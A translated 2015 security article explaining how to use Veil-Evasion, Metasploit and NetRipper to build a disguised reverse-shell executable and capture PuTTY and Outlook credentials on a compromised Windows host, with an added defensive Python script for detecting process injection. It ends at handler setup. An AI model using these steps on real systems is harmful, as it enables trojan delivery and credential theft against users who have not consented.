Using Metasploit/NetRipper to sniff encrypted PuTTY/Outlook accounts

ID MYHACK58:62201565934
Type myhack58
Reporter Anonymous
Modified 2015-08-19T00:00:00



This year, the 23rd annual Defcon conference opened in Las Vegas, USA, and NetRipper was made available for the first time at this Defcon. NetRipper is a post-exploitation tool for Windows. Running as a low-privileged user, it uses API hooking to intercept network traffic and encryption-related information, so it can capture plaintext traffic as well as encrypted traffic.

See the project's GitHub page for details about the project.


NetRipper provides a standalone command-line injection method: if you have successfully compromised a Windows target host, it lets you load/execute arbitrary commands on that system. This article, however, covers the pre-compiled "malicious" executable method, whose function is carried out by Meterpreter's built-in reverse_tcp shell. Note also that NetRipper can inject into Firefox, Chrome, Lync (Skype for Business), PuTTY, WinSCP, SQL Server Management Studio and the Microsoft Outlook client and capture the relevant network data. This article deals with PuTTY and Outlook, and the operations involved do not require administrator or SYSTEM privileges.
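Seen from the defender's side, injection into these applications by a process that has no administrator rights can be hunted in process telemetry. The following is an added example, not code from the original article or from the NetRipper project: it triages Sysmon-style CreateRemoteThread (event 8) and ProcessAccess (event 10) records. It assumes the injection surfaces as one of those events, and the executable names, the trusted-directory list and the sample events are constructed for illustration.

```python
import ntpath

# Image names for the applications the article lists as targets
# (mapping product names to executables is an assumption of this example).
WATCHED = {"putty.exe", "outlook.exe", "winscp.exe", "firefox.exe",
           "chrome.exe", "lync.exe", "ssms.exe"}
# Directories a low-privileged user normally cannot write to (tunable assumption).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# PROCESS_CREATE_THREAD (0x0002) | PROCESS_VM_WRITE (0x0020)
INJECT_RIGHTS = 0x0002 | 0x0020

def triage(event):
    """Return an alert string for a suspicious cross-process event, else None."""
    eid = event.get("EventID")
    if eid not in (8, 10):          # 8 = CreateRemoteThread, 10 = ProcessAccess
        return None
    target = ntpath.basename(event["TargetImage"]).lower()
    source = event["SourceImage"]
    # Ignore unwatched targets and sources living in admin-only directories.
    if target not in WATCHED or source.lower().startswith(TRUSTED_DIRS):
        return None
    if eid == 8:
        return f"remote thread created in {target} by {source}"
    if int(event["GrantedAccess"], 16) & INJECT_RIGHTS:
        return f"write/thread access to {target} requested by {source}"
    return None

# Constructed sample events using Sysmon field names; not real telemetry.
SAMPLE = [
    {"EventID": 8, "SourceImage": r"C:\Users\bob\Downloads\viewer.exe",
     "TargetImage": r"C:\Program Files\PuTTY\putty.exe"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "TargetImage": r"C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE",
     "GrantedAccess": "0x1F3FFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tools\procview.exe",
     "TargetImage": r"C:\Program Files\PuTTY\putty.exe",
     "GrantedAccess": "0x1000"},      # query-only access: not flagged
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\Downloads\viewer.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe"},  # target not watched
]

def run(events):
    """Triage a list of events and return only the alerts."""
    return [alert for alert in map(triage, events) if alert]

if __name__ == "__main__":
    print("\n".join(run(SAMPLE)))
```

The trusted-directory allowlist is what ties the rule to the no-administrator case described above: a source image in a user-writable path touching one of these applications is the signal worth reviewing.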

Exploitation (under experimental conditions) can be accomplished by the following steps:

  1. Use Veil-Evasion to create a "malicious" reverse_tcp shell executable. A user who runs this file will see a cute dolphin appear on the screen.

  2. Use a vulnerability that is already present in the system, and then obtain a reverse shell.

Our discussion focuses on the reverse_tcp shell executable method.

Use Veil-Evasion to create an .exe file:

use python/meterpreter/rev_tcp



set LPORT 4444




Set a base file name for the output files, and then select the payload builder to use.


Then replace the icon of the executable file with a picture of a dolphin, because the dolphin is very special. You can use Resource Hacker for this step.


Before using Metasploit, you need to download NetRipper and configure it

(NetRipper installation document: Readme):

    git clone
    cd NetRipper
    cd Metasploit
    cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/
    mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
    g++ -Wall netripper.cpp -o netripper
    cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
    cd ../Release
    cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

Configure Metasploit

Set up the reverse handler you will use, and start it.

